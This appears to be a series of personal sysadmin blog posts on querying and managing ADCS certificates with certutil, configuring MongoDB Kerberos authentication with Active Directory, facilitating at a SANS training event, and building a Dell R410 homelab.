certutil -view -restrict "requestername=domain\t.sluijter"



 


To show all certificates that I requested, displaying the serial numbers, the requestor's name and the CN on the certificate. It'll even show some statistics at the bottom:



certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,requestername,commonname"



 


Show all certificates provided to TESTBOX001. The query language is so unwieldy that you'll have to ask for "hosts >testbox001 and <testbox002".



certutil -view -restrict "commonname>testbox001,commonname<testbox002" -out "serialnumber,requestername,commonname"



 


A certificate request's disposition will show you errors that occurred during submission, but it'll also show other useful data. Issued certificates will show who approved the issuance. The downside to this is that the approver's name will disappear once the certificate is revoked. So you'll need to retain the auditing logs for ADCS!



certutil -view -restrict "requestid=381" -out "commonname,requestername,disposition,dispositionmessage"    


certutil -view -restrict "requestid=301" -out "commonname,requestername,disposition,dispositionmessage"    



 


Would you like to find out which certificate requests I approved? Then we'll need to add a bit more Powershell.



certutil -view -out "serialnumber,dispositionmessage" | Select-String "Resubmitted by DOMAIN\\t.sluijter"



 


Or even better yet:



certutil -view -out "serialnumber,dispositionmessage" | ForEach {
    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}
    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\\t.sluijter"){ Write-Output "$serial" }
}


 



Or something very important: do you want to find certificates that I both requested AND approved? That's a bad situation to be in...



certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,dispositionmessage" | ForEach {
    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}
    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\\t.sluijter"){ Write-Output "$serial" }
}


 



If you'd like to take a stab at the intended purpose for the certificate and its keypair, then you can take a gander at the template fields. While the template doesn't guarantee what the cert is for, it ought to give you an impression. 



certutil -view -restrict "requestid=301" -out "commonname,requestername,certificatetemplate"




Kerberos authentication in MongoDB, with Active Directory


I've been studying MongoDB recently, through the excellent Mongo University. I can heartily recommend their online courses! While not entirely self-paced, they allow you enough flexibility to finish each course within a certain timeframe. They combine video lectures with (ungraded) quizzes, graded labs and an exam. Good stuff!


I'm currently taking M310, the MongoDB Security course. One of the subjects covered is Kerberos authentication with MongoDB. In their lectures they show off a use-case with a Linux KDC, but I was more interested in reproducing the results with my Active Directory server. It took a little puzzling, a few good sources (linked below) and three hours of mucking about for the final troubleshooting. But it works very nicely!


 


On the Active Directory side:


 We'll have to make a normal user / service account first. I'll call it svc-mongo. This can easily be done in many ways; I used ADUC (AD Users and Computers).


Once svc-mongo exists, we'll connect it to a new Kerberos SPN: a Service Principal Name. This is how MongoDB will identify itself to Kerberos. We'll make the SPN, link it to svc-mongo and make the associated keytab (an authentication file, consider it the user's password) all in one blow:



ktpass /out m310.keytab /princ mongodb/database.m310.mongodb.university@CORP.BROEHAHA.NL /mapuser svc-mongo /crypto AES256-SHA1 /ptype KRB5_NT_PRINCIPAL /pass Password2



 


This creates the m310.keytab file and maps the SPN "mongodb/database.m310.mongodb.university" to the svc-mongo account. The SPN is written in the format "service/fullhostname", with the Kerberos realm appended after the @. The password for the user is also changed and some settings are set pertaining to the used cryptography and Kerberos structures.


You can verify the SPN's existence with the setspn -Q command. For example:



PS C:\Users\Thomas\Documents> setspn -Q mongodb/database.m310.mongodb.university
Checking domain DC=corp,DC=broehaha,DC=nl
CN=svc-mongo,CN=Users,DC=corp,DC=broehaha,DC=nl
       mongodb/database.m310.mongodb.university


Existing SPN found!



 


The m310.keytab file is then copied to the MongoDB server (database.m310.mongodb.university). In my case I use SCP, because I run Mongo on Linux. 


 


On the Linux side:


The m310.keytab file is placed into /etc/, with permissions set to 640 and ownership root:mongod. In order to use the keytab we can set an environment variable: KRB5_KTNAME="/etc/m310.keytab". This can be done in the profile of the user running MongoDB, or on RHEL derivatives in a sysconfig file.
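On a RHEL derivative that sysconfig file could look like this (a sketch; the path assumes your mongod unit or init script actually sources it, e.g. via EnvironmentFile=):

# /etc/sysconfig/mongod
KRB5_KTNAME=/etc/m310.keytab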


We need to set up /etc/krb5.conf with the bare minimum, so the Kerberos client can find the domain:



[libdefaults]
default_realm = CORP.BROEHAHA.NL


[realms]
CORP.BROEHAHA.NL = {
kdc = corp.broehaha.nl
admin_server = corp.broehaha.nl
}


[domain_realm]
.corp.broehaha.nl = CORP.BROEHAHA.NL
corp.broehaha.nl = CORP.BROEHAHA.NL


[logging]
default = FILE:/var/log/krb5.log



 


Speaking of finding the domain, there are a few crucial things that need to be setup correctly!



  • Both the KDC and the Mongo host need to be able to resolve each other's (fully qualified) hostnames and IP addresses.

  • Both hosts need to be in-sync when it comes to their clocks. So yeah, run NTP. 


With that out of the way, we can start making sure that MongoDB knows about my personal user account. If the Mongo database does not yet have any user accounts set up, then we'll need to use the "localhost bypass" so we can set up a root user first. Once there is an administrative user, run MongoD in normal authorization-enabled mode. For example, again the barest of bare minimums:



mongod --auth --bind_ip database.m310.mongodb.university --dbpath /data/db
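
If that administrative user doesn't exist yet, the localhost exception lets you create it first (a sketch; the password is obviously illustrative):

mongo --host localhost:27017
MongoDB> use admin
MongoDB> db.createUser({user:"root", pwd:"SuperSecret1", roles:["root"]})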



 


You can then connect as the administrative user so you can setup the Kerberos account(s):



mongo --host database.m310.mongodb.university:27017 --authenticationDatabase admin --user root --password
MongoDB> use $external
MongoDB> db.createUser({user:"tess@CORP.BROEHAHA.NL", roles:[{role:"root", db:"admin"}]})



 


And with that out of the way, we can now actually use Kerberos auth. We'll restart MongoD with Kerberos enabled, at the same time disabling the standard Mongo password authentication and thus locking out the root user we used above.



mongod --auth --bind_ip database.m310.mongodb.university --setParameter authenticationMechanisms=GSSAPI --dbpath /data/db



 


We can then request a Kerberos ticket for my own account, start a Mongo shell and authenticate inside Mongo as myself:



root@database:~# kinit tess@CORP.BROEHAHA.NL -V
Using default cache: /tmp/krb5cc_0
Using principal: tess@CORP.BROEHAHA.NL
Password for tess@CORP.BROEHAHA.NL:
Authenticated to Kerberos v5


root@database:~# mongo --host database.m310.mongodb.university:27017
MongoDB shell version: 3.2.21
connecting to: database.m310.mongodb.university:27017/test


MongoDB Enterprise > use $external
switched to db $external


MongoDB Enterprise > db.auth({mechanism:"GSSAPI", user:"tess@CORP.BROEHAHA.NL"})
1



 


HUZZAH! It worked!


Oh, right... What was the thing that took me hours of troubleshooting? Initially I ran MongoD without the --bind_ip option to tie it to the external IP address and hostname; I was running it on localhost. :( And thus the MongoD process identified itself to the KDC as mongodb/localhost. It never showed that in any logging, which is why I missed it. I had assumed that simply passing the keytab file was enough to authenticate.


 


Sources:




Certificate life-cycle management with ADCS


Following up on my previous post on querying ADCS with certutil, I spent an hour digging around ADCS some more with a colleague. We were looking for ways to make our lives easier when performing certificate life cycle management, i.e. figuring out which certs need replacing soon. 


Want to find all certs that expire before 0800 on January first 2022?



certutil -view -restrict "NotAfter<1/1/2022 08:00"



 


However, this also shows the revoked certificates, so let's focus on those that have the status "issued". Here's a list of the most interesting disposition values (20, or 0x14, being the one we want):

  • 9: request is pending
  • 20: certificate was issued
  • 21: certificate has been revoked
  • 30: certificate request failed
  • 31: certificate request was denied



certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14"



 


Now that'll give us the full dump of those certs, so let's focus on just getting the relevant request IDs.



certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14" -out "RequestId"



 


Mind you, many certs can be set up to auto-enroll, which means we can automatically renew them through the ADCS GUI by going into Template Management and telling AD to tweak all currently registered holders, making them re-enroll. That's a neat trick!


Of course this leaves us with a wad of certificates that need manual replacement. It's easier to handle these on a per-template basis. To filter on these, we'll need to get the template ID. You can do this through the ADCS GUI, or you can query a known cert and output its cert template ID.



certutil -view -restrict "requestid=3162" -out certificatetemplate



 


So our query now becomes:



certutil -view -restrict "NotAfter<1/1/2022 08:00,Disposition=0x14,certificatetemplate=1.3.6.1.4.1.311.21.8.7200461.8477407.14696588202437.5899189.95.14580585.6404328" -out "RequestId"



 


Sure, the output isn't easily used in a script unless you add some output parsing (there are white lines and all manner of cruft around the request IDs), but you get the picture. This will at least help you get a quick feeling for the amount of work you're up against.



I got accepted as SANS Facilitator!

Great news everyone!

The excitement is palpable!


A number of past colleagues waxed lyrical about SANS trainings: in-depth, high-tech, wizardry, grueling pace and super-hard work! And at the same time one heck of a lot of fun! And I must admit that I've spent quite a few hours browsing their site, drooling at the courses and exams they offer. They certainly are a well-known name in the InfoSec world, having a good reputation and being downright famous for their coin challenges and the high level of skill they both garner and require.


Unfortunately I could never get past the steep bill! Yes, they're very good! But each course rings in at around $6000! And their NetWars and exams don't come cheap either! So I just sighed and closed the tab, only to revisit months later. But this year things changed! Somewhere in September I learned something that I should've known before! I don't even remember whether I read about it on Reddit, on Tweakers or on TechExams, but it was a great find nonetheless!


SANS offer what they call the Work/Study Program. To quote their own site:



"The Work Study Program is a popular and competitive method of SANS training which allows a selected applicant the opportunity to attend a live training event as a facilitator at a highly discounted tuition rate. SANS facilitators are cheerful, friendly, and ever-ready professionals who are selected to assist SANS staff and instructors in conducting a positive learning environment. Advantages of the SANS Work Study Program include:



  • Attend and participate in a 4-6 day course

  • Receive related courseware materials

  • Work with Certified Instructors and SANS Staff

  • Attend applicable Vendor Lunch & Learns, SANS@Night, and other Special Events

  • Opportunities to network with security professionals

  • Free corresponding GIAC certification exam attempt [if available], when lodging onsite at the host hotel

  • Request early access to online OnDemand integrated slides and notes [if available]"



How great is that?! By helping out at the event and putting in a lot of hard work, you get a discount, plus a whole wad of extras to make sure you still get the full benefit of the training you signed up for! I decided then and there to apply for the role of Facilitator for the upcoming Amsterdam event, in January 2019.


I honestly did not think I stood much of a chance because, as SANS say, it's highly competitive and SANS often prefer past SANS students or facilitators, and I am neither. On the upside, I do have a lot of organizational experience in running events, with many thanks to all those years of staffing and volunteering with AnimeCon.


I'd almost forgotten about my application, until a few weeks ago when the email above showed up! OMG! O_O I got accepted!


Now that all the paperwork has been settled I also have a better grasp of both my responsibilities and the perks I'll be receiving. I was assigned to SEC566 - Implementing and Auditing Critical Security Controls, a five-day course (the whole event actually lasts six days). My duties at the event are actually not dissimilar to gophering at AnimeCon! I'll be assisting the course's trainer, basically not leaving their side unless they need something from outside. I'll also be responsible for the security of the assigned classroom and will act as a sort-of guide and friendly face to the other students. Where "normal" students will have 0900-1700 days, mine will most likely be 0700-1900. That's gonna be tough! The Sunday before the event starts will also be a full workday, preparing the venue with all the cabling, networking, equipment and the book bags for students.


And that discount we're getting? When I signed up I had not fully understood what SANS wrote on their site:



"The Work Study tuition fee is USD 1,500 or EUR 1,300 plus any VAT depending on the event location. Should you be selected to facilitate a Summit presentation, the fee is $250 or 217 per day plus any VAT for European events. International Tax/VAT will apply for certain events."



A €1300 discount sounded pretty darn good to me, when combined with all those bonuses! Turns out I misunderstood. The final fee is €1300! So on a total value of >$8100, they're discounting me €6800.  O_O


To say I'm stoked for SANS Amsterdam, would be severely understating my situation! I am very grateful for being given this opportunity and I'm going to work my ass off! I'll make sure SANS won't regret having accepted me!



Expanding my homelab

(C) Dell

For the past X years, I've run my homelab on my Macbook Air. I've always been impressed with how much you can get away with on this light portable, sporting an i5 and 8GB of RAM. It'll run two Win2012 VMs and a number of small Linux hosts, alongside the MacOS host.


But there's the urge for more! I've been playing with so much cool stuff over the years! I want to emulate a whole corporate environment for my studies and tests!


Like the OpenSOC folks, I've been eyeing those Skull Canyon Intel NUCs. They're so sexy! Tiny footprint, combined with great performance! But they're also quite expensive and they don't have proper storage on board. My colleague Martin put me on the trail of local refurbishers and last week I hit gold. 


Well... Fool's Gold, maybe. But still! It was shiny, it looked decent and the price was okay. I bought a refurbished Dell R410.


Quick specs:



  • 2x Xeon quad core E5620 @2.4GHz

  • 16 GB RAM

  • 2x 2TB SATA HDD, connected to the 6i (cheaper) RAID controller.

  • Room for 2 more HDD, though I'd have to spend €20 for two brackets.

  • iDRAC6 Enterprise 


Yes, it's pretty old already (generation 11 Dell hardware). Yes, it's power hungry. Yes, it's loud. But it was affordable and it's giving me a chance to work with enterprise hardware again, after being out of the server rooms for a long while. 


After receiving the pizza box and inspecting it for damage, the first order of business was to set up its iDRAC6. iDRAC is Dell's solution to what vendors like HP call iLO: a tiny bit of embedded hardware that can be used across the network to manage the whole server's hardware.


The iDRAC configuration was tackled swiftly and the web interface was available immediately. It took a bit of digging in Dell's documentation, but I learned how to flash the iDRAC6 firmware so I could upgrade it to the latest (2.95) version. It really was as easy as downloading the "monolithic" iDRAC firmware, extracting the .D6 file and uploading it through the iDRAC web interface. Actually finding the upload/update button in the interface took more effort :p


Getting the iDRAC6 remote console working took a little more research. For version 6 of the hardware, the remote console relies upon a Java application, which you can call by clicking a button in the web interface. What this does is download a JNLP configuration file, which in turn downloads the actual JAR file for execution. This is a process that doesn't work reliably on modern MacOS due to all the restrictions put on Java. The good news is that Github user Nicola ("XBB") provides instructions on how to reliably and quickly start the remote console for any iDRAC6 on MacOS, Linux and Windows. 
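As I understand that approach, it boils down to grabbing the viewer JAR plus its native libraries from the iDRAC once, then launching the viewer directly and skipping Java Web Start entirely. Roughly along these lines (a sketch; the IP is illustrative and root/calvin are Dell's factory-default iDRAC credentials):

java -cp avctKVM.jar -Djava.library.path=./lib com.avocent.idrac.kvm.Main ip=192.168.1.120 kmport=5900 vport=5900 apcp=1 version=2 user=root passwd=calvin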


Last night I installed VMWare ESXi 6.5, which I've been told is the highest version that'll work on this box. No worries, it's good stuff! The installation worked well, installing onto a SanDisk Cruzer Fit mini USB-drive that's stuck into the front panel. I still have a lot of learning to do with VMWare :)


In the meantime, there are two VMs building and updating (Win2012 and CentOS7), so I can use them as the basis for my "corporate" environment.


My plans for the near future:



  • Build an AD domain.

  • Build an AD CS-based PKI. 

  • Extend the PKI with a smartcard or USB HSM for private key storage.

  • Build a Graylog stack for logging.

  • Build a TIG stack for monitoring.

  • Later on add a pfSense box to serve as gateway, separating my lab from our home's network.


I'm having so much fun! :D


